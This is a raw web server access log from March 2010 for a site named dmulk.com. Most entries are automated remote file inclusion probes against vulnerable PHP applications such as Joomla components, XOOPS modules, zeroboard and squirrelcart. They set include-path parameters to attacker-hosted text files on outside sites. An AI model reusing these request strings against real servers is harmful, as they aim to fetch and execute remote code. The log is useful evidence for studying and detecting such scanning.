209.197.232.13 - - [12/Mar/2010:10:03:51 -0800] "GET /appserv/main.php?appserv_root=http://www.la-contemporaine.fr/IMG/arton100.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:03:51 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.la-contemporaine.fr/IMG/arton100.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:03:51 -0800] "GET /logs/access_090203.log/appserv/main.php?appserv_root=http://www.la-contemporaine.fr/IMG/arton100.png? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:10:03:53 -0800] "GET /logs/access_091205.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:10:04:02 -0800] "GET /logs/access_091205.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:10:04:06 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:10:04:06 -0800] "GET /logs/access_090604.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:10:04:06 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:10:04:06 -0800] "GET /logs/access_090729.log HTTP/1.0" 200 3437180 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:04:07 -0800] "GET /logs/access_080501.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:04:07 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:04:07 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:04:13 -0800] "GET /logs/access_090604.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:04:13 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:04:13 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:04:18 -0800] "GET /logs/access_090521.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:10:04:21 -0800] "GET /logs/access_090521.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:10:04:38 -0800] "GET /logs/access_090513.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:10:04:38 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:10:04:39 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:04:44 -0800] "GET /logs/access_080327.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.224 - - [12/Mar/2010:10:04:53 -0800] "GET /blog/index.php/2008/06/page/3/ HTTP/1.0" 200 10371 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:04:58 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:04:58 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:04:58 -0800] "GET /logs/access_091125.log//bbs//skin/zero_vote/ask_password.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:05:13 -0800] "GET /logs/access_090428.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:10:05:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:10:05:16 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:10:05:16 -0800] "GET /logs/access_091125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:05:21 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:05:22 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:05:22 -0800] "GET /logs/access_091125.log//bbs//skin/zero_vote/ask_password.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:05:22 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:05:22 -0800] "GET /logs/access_100122.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:05:25 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:10:05:34 -0800] "GET /logs/access_080216.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:10:05:34 -0800] "GET /logs/access_090424.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:05:39 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:05:39 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:05:39 -0800] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:05:41 -0800] "GET /logs/access_090428.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:05:43 -0800] "GET /logs/access_080619.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:05:44 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:05:44 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:10:05:46 -0800] "GET /logs/auth/auth_phpbb/phpbb_root_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:10:05:47 -0800] "GET /auth/auth_phpbb/phpbb_root_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:10:05:48 -0800] "GET /logs/access_080718.log%20%20/auth/auth_phpbb/phpbb_root_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:05:49 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:05:49 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:05:49 -0800] "GET /logs/access_080619.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:06:02 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:06:02 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:06:02 -0800] "GET /logs/access_090428.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:06:02 -0800] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:06:03 -0800] "GET /logs/access_080519.log%20%20/index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:06:03 -0800] "GET /logs/index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:06:04 -0800] "GET /index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 200 14969 "-" "Mozilla/5.0" "dmulk.com"
216.119.103.12 - - [12/Mar/2010:10:06:04 -0800] "GET /logs/access_090908.log%20%20/myevent.php?myevent_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:25 -0800] "GET /logs////bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:25 -0800] "GET ///bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:25 -0800] "GET /logs/access_100216.log////bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:27 -0800] "GET /news/newstopic_inc.php?indir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:27 -0800] "GET /logs/news/newstopic_inc.php?indir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:27 -0800] "GET /logs/access_081101.log%20%20/news/newstopic_inc.php?indir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:10:06:29 -0800] "GET /logs/access_090703.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:29 -0800] "GET /news/newstopic_inc.php?indir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:29 -0800] "GET /logs/access_081101.log/news/newstopic_inc.php?indir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:30 -0800] "GET /logs/news/newstopic_inc.php?indir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:10:06:33 -0800] "GET /logs/access_090709.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:06:34 -0800] "GET /logs/access_100122.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:06:36 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:36 -0800] "GET /logs/access_091211.log%20%20/news/newstopic_inc.php?indir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:06:36 -0800] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:06:36 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:06:36 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:37 -0800] "GET /news/newstopic_inc.php?indir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:37 -0800] "GET /logs/news/newstopic_inc.php?indir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:37 -0800] "GET /logs/access_081101.log/news/newstopic_inc.php?indir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:37 -0800] "GET /logs/access_091211.log/news/newstopic_inc.php?indir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:06:38 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:06:38 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:06:38 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:06:38 -0800] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:06:43 -0800] "GET /cart_content.php?cart_isp_root=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:06:43 -0800] "GET /logs/cart_content.php?cart_isp_root=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:06:43 -0800] "GET /logs/access_080216.log/cart_content.php?cart_isp_root=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:06:43 -0800] "GET /logs/access_090424.log/cart_content.php?cart_isp_root=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:10:06:45 -0800] "GET /logs/access_090604.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:45 -0800] "GET /logs/access_091211.log/news/newstopic_inc.php?indir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:06:50 -0800] "GET /logs/access_100305.log////bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:06:52 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:06:52 -0800] "GET /logs/access_100122.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:06:54 -0800] "GET /logs/access_080501.log//modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:06:56 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:06:56 -0800] "GET /logs/access_090227.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:06:56 -0800] "GET /logs/access_090530.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:06:56 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:06:56 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:06:56 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:06:56 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:06:56 -0800] "GET /logs/access_090227.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:06:56 -0800] "GET /logs/access_090530.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:06:57 -0800] "GET /logs/access_100122.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:06:57 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:06:59 -0800] "GET /logs/access_090428.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:07:00 -0800] "GET /logs/access_080619.log//modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:07:00 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:07:06 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:07:06 -0800] "GET /logs/access_080327.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:07:06 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:07:07 -0800] "GET /logs/access_080619.log//modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
